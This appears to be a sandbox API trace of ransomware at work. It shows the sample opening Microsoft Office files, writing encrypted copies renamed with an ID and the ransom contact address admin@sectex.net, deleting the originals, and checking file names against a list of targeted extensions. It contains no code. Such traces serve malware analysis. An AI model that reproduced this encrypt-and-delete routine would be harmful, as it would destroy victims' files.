	[0142.365] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbef30, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbef30, lpOverlapped=0x0) returned 1
	[0142.381] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.381] WriteFile (in: hFile=0x3b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0142.381] SetEndOfFile (hFile=0x3b4) returned 1
	[0142.381] CloseHandle (hObject=0x3b4) returned 1
	[0142.381] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.381] SetEndOfFile (hFile=0x3a0) returned 1
	[0142.504] CloseHandle (hObject=0x3a0) returned 1
	[0142.505] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.527] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx")) returned 1
	[0142.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.527] lstrlenW (lpString=".doc") returned 4
	[0142.527] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.527] lstrlenW (lpString=".docx") returned 5
	[0142.527] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.527] lstrlenW (lpString=".pdf") returned 4
	[0142.527] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.527] lstrlenW (lpString=".xls") returned 4
	[0142.527] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.527] lstrlenW (lpString=".xlsx") returned 5
	[0142.528] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.528] lstrlenW (lpString=".ppt") returned 4
	[0142.528] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.528] lstrlenW (lpString=".zip") returned 4
	[0142.528] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString=".rar") returned 4
	[0142.528] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString=".bz2") returned 4
	[0142.528] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString=".7z") returned 3
	[0142.528] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.528] lstrlenW (lpString=".dbf") returned 4
	[0142.528] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.528] lstrlenW (lpString=".1cd") returned 4
	[0142.528] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.528] lstrlenW (lpString=".jpg") returned 4
	[0142.528] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.528] lstrlenW (lpString=".doc") returned 4
	[0142.528] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString=".docx") returned 5
	[0142.528] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.528] lstrlenW (lpString=".pdf") returned 4
	[0142.528] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString=".xls") returned 4
	[0142.528] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.528] lstrlenW (lpString=".xlsx") returned 5
	[0142.528] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.528] lstrlenW (lpString=".ppt") returned 4
	[0142.529] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.529] lstrlenW (lpString=".zip") returned 4
	[0142.529] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.529] lstrlenW (lpString=".rar") returned 4
	[0142.529] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.529] lstrlenW (lpString=".bz2") returned 4
	[0142.529] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.529] lstrlenW (lpString=".7z") returned 3
	[0142.529] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.529] lstrlenW (lpString=".dbf") returned 4
	[0142.529] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.529] lstrlenW (lpString=".1cd") returned 4
	[0142.529] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx") returned 79
	[0142.529] lstrlenW (lpString=".jpg") returned 4
	[0142.529] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.529] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.530] lstrlenW (lpString="Urban.eftx") returned 10
	[0142.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.699] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=19611) returned 1
	[0142.699] CloseHandle (hObject=0x3d0) returned 1
	[0142.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx")) returned 0x20
	[0142.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0142.699] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.699] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0142.700] GetLastError () returned 0x0
	[0142.700] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x4c9b, lpOverlapped=0x0) returned 1
	[0142.702] WriteFile (in: hFile=0x3c8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x4ca0, lpOverlapped=0x0) returned 1
	[0142.703] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.704] WriteFile (in: hFile=0x3c8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0142.704] SetEndOfFile (hFile=0x3c8) returned 1
	[0142.704] CloseHandle (hObject=0x3c8) returned 1
	[0142.704] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.704] SetEndOfFile (hFile=0x3d0) returned 1
	[0142.707] CloseHandle (hObject=0x3d0) returned 1
	[0142.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.708] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx")) returned 1
	[0142.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.708] lstrlenW (lpString=".doc") returned 4
	[0142.708] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.708] lstrlenW (lpString=".docx") returned 5
	[0142.708] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.708] lstrlenW (lpString=".pdf") returned 4
	[0142.708] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.708] lstrlenW (lpString=".xls") returned 4
	[0142.708] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.708] lstrlenW (lpString=".xlsx") returned 5
	[0142.708] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.708] lstrlenW (lpString=".ppt") returned 4
	[0142.708] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.708] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.708] lstrlenW (lpString=".zip") returned 4
	[0142.708] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.708] lstrlenW (lpString=".rar") returned 4
	[0142.708] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.708] lstrlenW (lpString=".bz2") returned 4
	[0142.709] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString=".7z") returned 3
	[0142.709] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.709] lstrlenW (lpString=".dbf") returned 4
	[0142.709] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.709] lstrlenW (lpString=".1cd") returned 4
	[0142.709] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.709] lstrlenW (lpString=".jpg") returned 4
	[0142.709] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.709] lstrlenW (lpString=".doc") returned 4
	[0142.709] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString=".docx") returned 5
	[0142.709] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.709] lstrlenW (lpString=".pdf") returned 4
	[0142.709] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString=".xls") returned 4
	[0142.709] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString=".xlsx") returned 5
	[0142.709] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.709] lstrlenW (lpString=".ppt") returned 4
	[0142.709] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.709] lstrlenW (lpString=".zip") returned 4
	[0142.709] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString=".rar") returned 4
	[0142.709] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.709] lstrlenW (lpString=".bz2") returned 4
	[0142.710] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.710] lstrlenW (lpString=".7z") returned 3
	[0142.710] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.710] lstrlenW (lpString=".dbf") returned 4
	[0142.710] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.710] lstrlenW (lpString=".1cd") returned 4
	[0142.710] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77
	[0142.710] lstrlenW (lpString=".jpg") returned 4
	[0142.710] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.710] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0142.710] lstrlenW (lpString="CAGCAT10.DLL") returned 12
	[0142.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.735] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=15776) returned 1
	[0142.735] CloseHandle (hObject=0x3a0) returned 1
	[0142.735] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll")) returned 0x20
	[0142.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.752] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0142.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.753] lstrlenW (lpString=".doc") returned 4
	[0142.753] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0142.753] lstrlenW (lpString=".docx") returned 5
	[0142.753] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1
	[0142.753] lstrlenW (lpString=".pdf") returned 4
	[0142.753] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0142.753] lstrlenW (lpString=".xls") returned 4
	[0142.753] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0142.753] lstrlenW (lpString=".xlsx") returned 5
	[0142.753] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1
	[0142.753] lstrlenW (lpString=".ppt") returned 4
	[0142.753] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0142.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.753] lstrlenW (lpString=".zip") returned 4
	[0142.753] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0142.753] lstrlenW (lpString=".rar") returned 4
	[0142.753] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0142.753] lstrlenW (lpString=".bz2") returned 4
	[0142.753] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0142.753] lstrlenW (lpString=".7z") returned 3
	[0142.753] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0142.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.753] lstrlenW (lpString=".dbf") returned 4
	[0142.753] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0142.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.753] lstrlenW (lpString=".1cd") returned 4
	[0142.753] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0142.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.753] lstrlenW (lpString=".jpg") returned 4
	[0142.753] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0142.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.754] lstrlenW (lpString=".doc") returned 4
	[0142.754] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0142.754] lstrlenW (lpString=".docx") returned 5
	[0142.754] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1
	[0142.754] lstrlenW (lpString=".pdf") returned 4
	[0142.754] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0142.754] lstrlenW (lpString=".xls") returned 4
	[0142.754] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0142.754] lstrlenW (lpString=".xlsx") returned 5
	[0142.754] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1
	[0142.754] lstrlenW (lpString=".ppt") returned 4
	[0142.754] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0142.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.754] lstrlenW (lpString=".zip") returned 4
	[0142.754] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0142.754] lstrlenW (lpString=".rar") returned 4
	[0142.754] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0142.754] lstrlenW (lpString=".bz2") returned 4
	[0142.754] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0142.754] lstrlenW (lpString=".7z") returned 3
	[0142.754] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0142.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.754] lstrlenW (lpString=".dbf") returned 4
	[0142.754] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0142.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.754] lstrlenW (lpString=".1cd") returned 4
	[0142.754] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0142.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61
	[0142.754] lstrlenW (lpString=".jpg") returned 4
	[0142.754] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0142.755] lstrcmpiW (lpString1=".MMW", lpString2=".bot") returned 1
	[0142.755] lstrlenW (lpString="CAGCAT10.MMW") returned 12
	[0142.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.755] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=394200) returned 1
	[0142.755] CloseHandle (hObject=0x3a0) returned 1
	[0142.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw")) returned 0x20
	[0142.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.756] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.756] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0143.239] GetLastError () returned 0x0
	[0143.239] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x603d8, lpOverlapped=0x0) returned 1
	[0143.255] WriteFile (in: hFile=0x31c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x603e0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x603e0, lpOverlapped=0x0) returned 1
	[0143.262] ReadFile (in: hFile=0x3a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0143.262] WriteFile (in: hFile=0x31c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0143.262] SetEndOfFile (hFile=0x31c) returned 1
	[0143.262] CloseHandle (hObject=0x31c) returned 1
	[0143.262] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.262] SetEndOfFile (hFile=0x3a0) returned 1
	[0143.336] CloseHandle (hObject=0x3a0) returned 1
	[0143.336] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0143.336] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw")) returned 1
	[0143.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.336] lstrlenW (lpString=".doc") returned 4
	[0143.336] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1
	[0143.336] lstrlenW (lpString=".docx") returned 5
	[0143.336] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1
	[0143.336] lstrlenW (lpString=".pdf") returned 4
	[0143.336] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1
	[0143.337] lstrlenW (lpString=".xls") returned 4
	[0143.337] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1
	[0143.337] lstrlenW (lpString=".xlsx") returned 5
	[0143.337] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1
	[0143.337] lstrlenW (lpString=".ppt") returned 4
	[0143.337] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1
	[0143.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61
	[0143.337] lstrlenW (lpString=".zip") returned 4
	[0143.337] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1
	[0143.337] lstrlenW (lpString=".rar") returned 4
